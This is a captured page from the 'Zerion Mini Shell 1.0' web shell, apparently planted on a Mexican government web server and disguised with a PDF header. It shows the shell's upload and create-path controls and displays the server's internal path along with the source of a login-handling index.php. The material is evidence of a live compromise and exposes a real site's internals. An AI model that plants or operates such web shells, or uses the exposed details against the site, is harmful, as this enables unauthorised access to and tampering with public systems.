%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/portal.tjamich.gob.mx/infofi/
Upload File :
Create Path :
Current File : /home/tjamichg/portal.tjamich.gob.mx/infofi/index.php

<?php
ini_set('display_errors', 1); 
ini_set('display_startup_errors', 1); 
error_reporting(E_ALL);
if(include_once("conn.php")){
    
    include_once("functions.php");
    
    session_start();
    
    if(isset($_SESSION['activa'])){
        if(!empty($_SESSION['activa'])){
            if(!empty($_GET['token'])){
                if($_SESSION['activa'] == base64_decode($_GET['token'])){
                    tiempoL();
                    include_once("head.php");
                    paginado();
                    include_once("foot.php");
                } else { session_destroy(); header('Location: index.php'); }
            } else { session_destroy(); header('Location: index.php'); }
        } else {
            include_once("modules/login/login.php");
        }
    } else {
        include_once("modules/login/login.php");
    }
    
} else {
    echo "Existen problemas para cargar el software; contacte a su administrador del sistema";
}

?>

Zerion Mini Shell 1.0